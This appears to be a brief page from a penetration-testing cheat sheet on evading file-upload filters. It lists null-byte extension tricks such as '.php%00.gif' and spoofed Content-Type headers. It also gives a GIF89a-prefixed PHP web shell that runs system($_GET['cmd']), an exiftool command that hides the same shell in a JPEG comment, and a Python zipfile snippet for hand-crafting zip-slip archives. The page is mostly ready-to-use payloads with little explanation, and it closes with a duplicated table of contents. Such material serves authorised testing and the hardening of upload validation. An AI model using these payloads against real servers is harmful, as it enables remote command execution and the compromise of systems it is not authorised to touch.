Tricks

Null Byte
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
Mime type
Content-Type : image/gif
Content-Type : image/png
Content-Type : image/jpeg
GIF89a;
GIF89a;
<?
system($_GET['cmd']);
?>
Inside image's content
exiftool -Comment='<?php system($_GET['cmd']); ?>' photo.jpg
Create ZIP manually (e.g: zipslip)
Using zipfile​
from zipfile import ZipFile
​
zip = ZipFile("test.zip", "w")
zip.writestr("path", "content")
​
zip.close()

Last modified 2yr ago

Tricks

Null Byte

Mime type

GIF89a;

Inside image's content

Create ZIP manually (e.g: zipslip)

Using zipfile​

Using zipfile